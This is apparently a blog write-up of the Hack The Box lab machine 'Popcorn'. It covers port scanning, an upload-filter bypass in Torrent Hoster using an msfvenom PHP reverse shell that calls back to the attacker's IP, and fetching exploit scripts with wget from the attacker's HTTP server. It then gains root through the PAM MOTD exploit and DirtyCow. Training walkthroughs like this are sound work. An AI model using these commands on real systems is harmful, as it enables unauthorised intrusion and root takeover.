---
title: "Popcorn Hackthebox"
date: 2021-03-27T18:55:47+01:00
draft: false
image: "/static/HACKING/popcorn-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/popcorn-index.jpg)

# [*] INDEX: 

- [BOX INFO](#-box-info--)
- [GAINING ACCESS](#-part-1---gain-access)
- [MOTD PRIVILEGE ESCALATION](#-part-21---motd-privesc)
- [DIRTY COW PRIVILEGE ESCALATION](#-part-22---dirty-cow-privesc)

# [+] BOX INFO 💻 :

```
Operative System : Linux 🐧
Difficulty : Medium 🌓
Owner : ch4p
IP : 10.10.10.6
```

# [+] PART 1 - GAIN ACCESS

The first step is scanning machine's ports with nmap:

> [nmap -p- --open -T5 -n 10.10.10.6](https://explainshell.com/explain?cmd=nmap+-p-+--open+-T5+-n+10.10.10.6)

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Once seen open ports, let's get a deeper scan :

> [nmap -sV -sC -sS -p22,80 10.10.10.6](https://explainshell.com/explain?cmd=nmap+-sV+-sC+-sS+-p22%2C80+10.10.10.6)

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Here we just can point out the http server, so, let's check it : 

![<- Not working](/static/HACKING/popcorn-1.png)

Let's try to get some info from the website, I'll be using `whatweb` : 

> [whatweb http://10.10.10.6/]

```bash
http://10.10.10.6/ [200 OK] Apache[2.2.12], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.12 (Ubuntu)], IP[10.10.10.6]
```

Hmm nothing interesting, let's fuzz the website, I'll be using `wfuzz` : 

> wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt --hc=404 -L -u http://10.10.10.6/FUZZ

```sh
000000600:   200        656 L    3119 W     47507 Ch    "test"                                            
000003762:   200        293 L    882 W      11356 Ch    "torrent"                                         
000010628:   200        0 L      4 W        95 Ch       "rename"                                          
000041849:   200        4 L      25 W       177 Ch      "http://10.10.10.6/"
```

Let's go to "test":

![<- Not working](/static/HACKING/popcorn-2.png)

There are two recognized services, we will take them into account in case we need them later, let's see "torrent":

![<- Not working](/static/HACKING/popcorn-3.png)

Let's create a user : 

![<- Not working](/static/HACKING/popcorn-4.png)

> Creds I used -> `user:user`

Maybe there is a Torrent Hoster vulnerability.

![<- Not working](/static/HACKING/popcorn-5.png)

Yeah, and it has an exploit for it, I followed [this video](https://www.youtube.com/watch?v=7r-gf_LoTuQ)

![<- Not working](/static/HACKING/popcorn-6.png)

Let's upload a torrent file, in my case I used an example file from [here](https://webtorrent.io/free-torrents)

![<- Not working](/static/HACKING/popcorn-7.png)

Once uploaded our torrent file, let's create our payload, I'll get the command from this [cheat sheet](https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/): 

> msfvenom -p php/reverse_php LHOST=10.10.14.36 LPORT=8989 -f raw > shell.php

We have to bypass the file, so let's add the `.jpg` extension to the file : 

> [mv shell.php shell.php.jpg](https://explainshell.com/explain?cmd=mv+shell.php+shell.php.jpg)

Once done that, we have to open `burpsuite` and upload our payload : 

![<- Not working](/static/HACKING/popcorn-8.png)

Intercepting it with Burp :

![<- Not working](/static/HACKING/popcorn-9.png)

Let's send the request :

![<- Not working](/static/HACKING/popcorn-10.png)

Now copy the image file link, and make a request to it:

![<- Not working](/static/HACKING/popcorn-11.png)

![<- Not working](/static/HACKING/popcorn-12.png)

![<- Not working](/static/HACKING/popcorn-13.png)

Nice, got a shell as www-data. Let's ennumerate the system...

# [+] PART 2.1 - MOTD PRIVESC

Inside george directory I found a bunch of not common files and directories : 

```s
drwxr-xr-x 3 george george   4096 Oct 26 19:35 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26 19:35 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw------- 1 root   root     1571 Mar 17  2017 .mysql_history
-rw------- 1 root   root       19 May  5  2017 .nano_history
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Mar 27 20:02 user.txt
```

Inside /home/george/.cache I found this : 

```
motd.legal-displayed
```

Hmm this is interesting, let's see what's "motd" : `The /etc/motd is a file on Unix-like systems that contains a "message of the day", used to send a common message to all users in a more efficient manner than sending them all an e-mail message. `

So, let's see with `searchsploit`:

> sarchsploit motd

```
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation ( | linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation ( | linux/local/14339.sh
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion                        | windows/dos/1235.c
--------------------------------------------------------------------------------- ---------------------------------
```

Oh interesting... Let's check if the Linux PAM (Linux Pluggable Authentication Modules) is 1.1.0 :

> [dpkg -l | grep pam](https://explainshell.com/explain?cmd=dpkg+-l+%7C+grep+pam)

```
ii  libpam-modules                      1.1.0-2ubuntu1                    Pluggable Authentication Modules for PAM
ii  libpam-runtime                      1.1.0-2ubuntu1                    Runtime support for the PAM library
ii  libpam0g                            1.1.0-2ubuntu1                    Pluggable Authentication Modules library
ii  python-pam                          0.4.2-12ubuntu3                   A Python interface to the PAM library
```

And certainly yes, that's the version we're looking for, let's use that exploit.

### From our local machine : 

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

### From the victime machine : 

> [wget http://10.10.14.36:8000/14273.sh](https://explainshell.com/explain?cmd=wget+http%3A%2F%2F10.10.14.36%3A8000%2F14273.sh)

I tried to execute it, but I don't know why the shell doesn't allow me to do it, so let's try to get another shell, now I'll try to use the [Php reverse shell from PentestMonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)

Now the `shell.php` we uploaded is useless, let's do the same process with the new reverse-shell.

![<- Not working](/static/HACKING/popcorn-14.png)

There we go! Let's see if we can execute the file : 

![<- Not working](/static/HACKING/popcorn-15.png)

Hmmm I don't really understand why can't I execute this, let's try : 

> [bash 14273.sh](https://explainshell.com/explain?cmd=bash+14273.sh)

```
: command not found
14273.sh: line 30: syntax error: unexpected end of file
```

Oh, so bad! Let's use the other exploit : `14339.sh`.

### From our local machine : 

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

> [wget http://10.10.14.36:8000/14339.sh](https://explainshell.com/explain?cmd=wget+http%3A%2F%2F10.10.14.36%3A8000%2F14339.sh)

What? Syntax error is not a usual mistake on this kind of exploits, maybe we're not on the platform that exploit was coded for, so I'll be using `dos2unix` to turn a DOS format script into a UNIX format script.

> [dos2unix 14339.sh](https://explainshell.com/explain?cmd=dos2unix+14339.sh)

```
dos2unix: convirtiendo archivo 14339.sh a formato Unix..
```

Now let's transfer the file to the victim machine through python http method. And execute it : 

```s
./14339.sh 
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
whoami
root
```

# [+] PART 2.2 - DIRTY COW PRIVESC

This second way is a kernel vulnerability :

> [uname -a](https://explainshell.com/explain?cmd=uname+-a)

```
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
```

![<- Not working](/static/HACKING/popcorn-16.png)

So this is vulnerable to DirtyCow, let's download it.

Get it into victim machine and run this :

> [gcc -pthread dirty.c -o dirty -lcrypt](https://explainshell.com/explain?cmd=gcc+-pthread+dirty.c+-o+dirty+-lcrypt)

> [./dirty new_pass]

And now login into firefart with ssh:

> [ssh firefart@10.10.10.6](https://explainshell.com/explain?cmd=ssh+firefart%4010.10.10.6)

![<- Not working](/static/HACKING/popcorn-17.png)

# THANKS FOR READING 😊 !!